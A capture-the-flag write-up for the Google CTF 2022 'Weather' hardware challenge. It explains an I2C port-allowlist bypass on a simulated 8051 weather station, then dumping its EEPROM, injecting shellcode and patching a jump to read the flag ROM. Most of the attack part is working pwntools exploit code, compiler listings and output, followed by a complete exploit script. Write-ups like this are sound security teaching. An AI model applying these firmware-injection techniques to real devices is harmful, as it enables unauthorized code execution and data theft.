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Last active July 5, 2022 09:34
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Google CTF 2022 - Weather


Weather was a hardware challenge on Google CTF 2022 that was based around a weather station running on a microcontroller with attached sensors and a serial interface. The goal was to extract a flag from an internal ROM device.

For the, challenge we were given a datasheet containing details about the microcontroller, its attached devices and the interfaces available. We were also given the firmware source code written in c.

Reading the datasheet

Weather station circuit

From the datasheet we can determine the following information:

The microcontroller has three interfaces available: I2C for attached sensors, SPI for XRAM (external RAM), and UART for user communication with the weather station.

The XRAM attached through SPI, is a CTF-55930D, a 32K EEPROM storing the running program with an additional I2C interface (!).
If we were to write data to the EEPROM, we would not be writing actual bits but would be sending the EEPROM information on which bits to clear.

The microcontroller also has an internally attached ROM containing the flag which can be accessed through special registers in the memory space.

We have the following sensors attached through I2C:

  • Humidity Sensor at address 119
  • Light Sensors at 110 and 111
  • Pressure Sensor at 108
  • Temperature Sensor at 101

We can also get some clues on other parts of the setup:

The microcontroller is called CTF-8051, which together with the Special Function Registers hints at the controller being some form of an 8051 processor.

Analyzing the firmware source

From the firmware sources, we can determine how to interface with the weather station.

The first thing we could do knowing the goal was to try to find any references to flag ROM from which we want to read data, but outside the definitions of FLAGROM_ADDR and FLAGROM_DATA registers they were not used anywhere in the program so we will need to find another way in.

The communication is performed via UART (accessible through a network socket in our case) and after a prompt we can perform two actions:

  • A read, with r <addr> <size> which will read size bytes from the device at address addr
  • A write, with w <addr> <size> <byte1> <byte2> .. <byteN> which will write size bytes to device at address addr

The address provided in the command is checked against a list of predefined addresses:

const char *ALLOWED_I2C[] = {
  "101",  // Thermometers (4x).
  "108",  // Atmospheric pressure sensor.
  "110",  // Light sensor A.
  "111",  // Light sensor B.
  "119",  // Humidity sensor.

// [...]

bool is_port_allowed(const char *port) {
  for(const char **allowed = ALLOWED_I2C; *allowed; allowed++) {
    const char *pa = *allowed;
    const char *pb = port;
    bool allowed = true;
    while (*pa && *pb) {
      if (*pa++ != *pb++) {
        allowed = false;
    if (allowed && *pa == '\0') return true;
  return false;

uint8_t str_to_uint8(const char *s) {
  uint8_t v = 0;
  while (*s) {
    uint8_t digit = *s++ - '0';
    if (digit >= 10) return 0;
    v = v * 10 + digit;
  return v;

int8_t port_to_int8(char *port) {
  if (!is_port_allowed(port)) return -1;

  return (int8_t) str_to_uint8(port);

The code checking if our address is allowed is flawed though, it only checks the first 3 bytes of our input as all the predefined addresses are 3 bytes long. With the knowledge of that, if we were to send an address like 10100000000, it would get accepted as a valid address but would zero out the v variable in str_to_uint8 as after parsing the 101, it tried to parse our zeros into the number as well allowing us to then append an arbitrary address after it.

Finding the EEPROM

With the ability to communicate with arbitrary devices, we can scan all the possible 128 addresses if there are devices present with code like the following:

from pwn import *
p = remote('', 1337)

def read_from_address(address, size):
  p.recvuntil(b'? ')
  p.sendline(f'r {address} {size}'.encode())
  p.recvuntil(b'i2c status: ')
  status = p.recvline().strip()
  ret_data = p.recvuntil(b'\n-end\n', drop=True).decode().strip().split()
  return status, bytes([int(a) for a in ret_data])

for i in range(128):
  status, data = read_from_address(f'10100000000{i}', 128)
  if status != b'error - device not found':
    print(f'Device exists on address {i}')

With it we can discover a new unknown device at address 33. Based on the diagrams from the datasheet, it is very possible that it is the EEPROM containing the running program.

To verify that theory we can try reading the data pages from it following the instructions from the datasheet:

Reading data from a 64-byte page is done in two steps:

  1. Select the page by writing the page index to EEPROM's I2C address.
  2. Receive up to 64 bytes by reading from the EEPROM's I2C address.

To do that we can use code like the one below:

# See the code above to find the other functions used

def write_to_address(address, data):
  size = len(data)
  p.recvuntil(b'? ')
  p.sendline(f'w {address} {size} {" ".join([str(a) for a in data])}'.encode())
  p.recvuntil(b'i2c status: ')
  return p.recvline().strip()

write_to_address(f'1010000000033', [0])
status, data = read_from_address(f'1010000000033', 64)

With some data returned, we can try dumping all the 64 pages of it.

for i in range(64):
  write_to_address(f'1010000000033', [i])
  status, data = read_from_address(f'1010000000033', 64)

Now that we have the memory dumped, we can see what is inside it.

» strings eeprom.raw
// [...]
"i2c status: transaction completed / ready
i2c status: busy
i2c status: error - device not found
i2c status: error - device misbehaved
i2c status: unknown error
Weather Station
-err: command too long, rejected
-err: command format incorrect
-err: unknown command
-err: port invalid or not allowed
-err: I2C request length incorrect

This means that we did indeed dump the program memory.

Taking control of the device

Creating the shellcode

With access to the memory of the device, we can now see a way how to extract the flag out of the internal ROM.

To get some shellcode we can use sdcc which will produce a listing file (.lst) which will contain a program listing for our compiled program with instruction bytes, source code lines and other relevant information inside it.

The exploit code has to read the flag rom byte by byte and output the data into the SERIAL_OUT_DATA register for us to read it.

Sample exploit code:

#include <stdint.h>
__sfr __at(0xee) FLAGROM_ADDR;
__sfr __at(0xef) FLAGROM_DATA;
__sfr __at(0xf2) SERIAL_OUT_DATA;
__sfr __at(0xf3) SERIAL_OUT_READY;

int main(void) {
    uint8_t a = 0;
    while (a < 255) {
        FLAGROM_ADDR = a;
        while (!SERIAL_OUT_READY) {};
    return 0;

Then after compiling our exploit code with sdcc exploit.c, we can view exploit.lst to read out the instruction bytes for our exploit.

                                    140 ;	exploit.c:9: while (a < 255) {
      000000 7F 00            [12]  141 	mov	r7,#0x00
      000002                        142 00104$:
      000002 BF FF 00         [24]  143 	cjne	r7,#0xff,00126$
      000005                        144 00126$:
      000005 50 0C            [24]  145 	jnc	00106$
                                    146 ;	exploit.c:10: FLAGROM_ADDR = a;
      000007 8F EE            [24]  147 	mov	_FLAGROM_ADDR,r7
                                    148 ;	exploit.c:11: while (!SERIAL_OUT_READY) {};
      000009                        149 00101$:
      000009 E5 F3            [12]  150 	mov	a,_SERIAL_OUT_READY
      00000B 60 FC            [24]  151 	jz	00101$
                                    152 ;	exploit.c:12: SERIAL_OUT_DATA = FLAGROM_DATA;
      00000D 85 EF F2         [24]  153 	mov	_SERIAL_OUT_DATA,_FLAGROM_DATA
                                    154 ;	exploit.c:13: a++;
      000010 0F               [12]  155 	inc	r7
      000011 80 EF            [24]  156 	sjmp	00104$
      000013                        157 00106$:
                                    158 ;	exploit.c:15: return 0;
      000013 90 00 00         [24]  159 	mov	dptr,#0x0000
                                    160 ;	exploit.c:16: }
      000016 22               [24]  161 	ret

Writing our shellcode into memory

Near the end of program memory, we can see 24 pages filled with FF bytes which is a perfect place for us to write shellcode that would sequentially read bytes out of the flag rom and would send them to the UART interface.

It's the perfect place because as it was mentioned previously, writing data to the EEPROM is actually done by sending bits to clear, there is no way for us to set a 1 if it was cleared before. This place in memory lets us write exactly what we want without any larger constraints.

To write our data into a page with a bunch of FF bytes we can yet again turn to the datasheet to find out how to do that:

Programming the EEPROM is done by writing the following packet to the EEPROM's I2C address:
<PageIndex> <4ByteWriteKey> <ClearMask> ... <ClearMask>
The PageIndex selects a 64-byte page to operate on. The WriteKey is a 4 byte unlock key meant to prevent accidental overwrites.
Its value is constant: A5 5A A5 5A. Each ClearMask byte is applied to the consecutive bytes of the page, starting from byte at index 0.
All bits set to 1 in the ClearMask are cleared (set to 0) for the given byte in the given page on the EEPROM:
byte[i] ← byte[i] AND (NOT clear_mask_byte)

With that known, we can write a helper function to write given data into the EEPROM:

def write_eeprom_page(page, data):
  if len(data) != 64:
    data += b'\x00' * (64 - len(data))
  data = bytes([((~a) & 0xff) for a in data])
  write_to_address(f'1010000000033', bytes([page, 0xa5, 0x5a, 0xa5, 0x5a]) + data)

And to test it, we can write our shellcode into the first page which contains the FF bytes:

shellcode = bytes.fromhex('7F 00 BF FF 00 50 0C 8F EE E5 F3 60 FC 85 EF F2 0F 80 EF 90 00 00 22')

# Read the existing data
write_to_address(f'1010000000033', [40])
status, data = read_from_address(f'1010000000033', 64)
# 3900ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

# Write our shellcode with some nop bytes
write_eeprom_page(40, b'\x00' * 16 + shellcode)

# Verify if it was written
write_to_address(f'1010000000033', [40])
status, data = read_from_address(f'1010000000033', 64)
# 000000000000000000000000000000007f00bfff00500c8feee5f360fc85eff20f80ef9000002200000000000000000000000000000000000000000000000000

Finding a way to run our shellcode

The other problem is getting the shellcode to execute. If we were to place it at address 0xa00 (page 40), we could perform an LJMP 0xa00 instruction which according to the 8051 instruction reference would be 02 0a 00.

Knowing that we can try to find a place in main() that would allow us to clear some bits to turn some instruction into our jump.

First, we can try to correlate the data we dumped from the memory with a compiled version of the firmware. To do that, we can compile the firmware.c with sdcc and use the resulting listing again.

In the listing we can find that the main loop starts around the address 1099 (0x44B):

                                   1032 ;------------------------------------------------------------
                                   1033 ;	firmware.c:200: int main(void) {
                                   1034 ;	-----------------------------------------
                                   1035 ;	 function main
                                   1036 ;	-----------------------------------------
      000442                       1037 _main:
                                   1038 ;	firmware.c:201: serial_print("Weather Station\n");
      000442 90r00rA5         [24] 1039 	mov	dptr,#___str_5
      000445 75 F0 80         [24] 1040 	mov	b,#0x80
      000448 12r00r8D         [24] 1041 	lcall	_serial_print
                                   1042 ;	firmware.c:206: while (true) {
      00044B                       1043 00135$:
                                   1044 ;	firmware.c:207: serial_print("? ");
      00044B 90r00rB6         [24] 1045 	mov	dptr,#___str_6
      00044E 75 F0 80         [24] 1046 	mov	b,#0x80
      000451 12r00r8D         [24] 1047 	lcall	_serial_print

Then we can loop over the program bytes trying to find a place which we can use for the jump:

program = open('eeprom.raw', 'rb').read() # Previously extracted program memory

def and_bytes(a, b):
    return bytes([aa & bb for aa, bb in zip(a, b)])

target = b'\x02\x0a\x00'
for offset in range(0x44B, 0x6B9):
    if and_bytes(target, program[offset:offset+3]) == target:
        print(f'Jump possible at {hex(offset)}')

And with the position of a viable jump known, we can then overwrite the instructions with our helper write function:

page_number = offset // 64
instr_offset = offset % 64
jump_data = b'\x00' * instr_offset + target
jump_data += b'\x00' * (64 - len(jump_data))

write_eeprom_page(page_number, jump_data)

Then, with our jump written we need to send any valid command for the program to get to our jump:

p.sendline(b'r 1 1')

And with that, we get a dump of the flag ROM:

[*] Switching to interactive mode
? CTF{DoesAnyoneEvenReadFlagsAnymore?}
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00err: port invalid or not allowed
from pwn import *
p = remote('', 1337)
def read_from_address(address, size):
p.recvuntil(b'? ')
p.sendline(f'r {address} {size}'.encode())
p.recvuntil(b'i2c status: ')
status = p.recvline().strip()
ret_data = p.recvuntil(b'\n-end\n', drop=True).decode().strip().split()
return status, bytes([int(a) for a in ret_data])
def write_to_address(address, data):
size = len(data)
p.recvuntil(b'? ')
p.sendline(f'w {address} {size} {" ".join([str(a) for a in data])}'.encode())
p.recvuntil(b'i2c status: ')
return p.recvline().strip()
def write_eeprom_page(page, data):
if len(data) != 64:
data += b'\x00' * (64 - len(data))
data = bytes([((~a) & 0xff) for a in data])
write_to_address(f'1010000000033', bytes([page, 0xa5, 0x5a, 0xa5, 0x5a]) + data)
shellcode = bytes.fromhex('7F 00 BF FF 00 50 0C 8F EE E5 F3 60 FC 85 EF F2 0F 80 EF 90 00 00 22')
# Read the existing data
write_to_address(f'1010000000033', [40])
status, data = read_from_address(f'1010000000033', 64)
# Write our shellcode with some nop bytes
write_eeprom_page(40, b'\x00' * 16 + shellcode)
# Verify if it was written
write_to_address(f'1010000000033', [40])
status, data = read_from_address(f'1010000000033', 64)
program = open('eeprom.raw', 'rb').read() # Previously extracted program memory
def and_bytes(a, b):
return bytes([aa & bb for aa, bb in zip(a, b)])
target = b'\x02\x0a\x00'
for offset in range(0x44B, 0x6B9):
if and_bytes(target, program[offset:offset+3]) == target:
print(f'Jump possible at {hex(offset)}')
page_number = offset // 64
instr_offset = offset % 64
jump_data = b'\x00' * instr_offset + target
jump_data += b'\x00' * (64 - len(jump_data))
write_eeprom_page(page_number, jump_data)
p.sendline(b'r 1 1')
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